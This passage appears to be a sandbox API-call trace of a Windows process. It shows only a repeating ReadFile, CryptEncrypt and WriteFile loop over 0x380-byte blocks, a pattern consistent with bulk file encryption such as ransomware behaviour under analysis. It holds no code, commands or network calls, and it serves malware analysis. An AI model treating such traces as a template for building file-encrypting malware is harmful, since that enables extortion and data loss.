WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.485] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.485] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.485] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.485] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.485] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.486] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.486] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.486] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.486] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.486] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.487] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.487] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.487] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.487] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.487] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.487] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.487] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.487] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.488] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.488] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.488] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.488] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.489] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.490] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.490] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.490] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.490] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.491] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.491] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.492] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.492] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.492] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.492] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.492] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 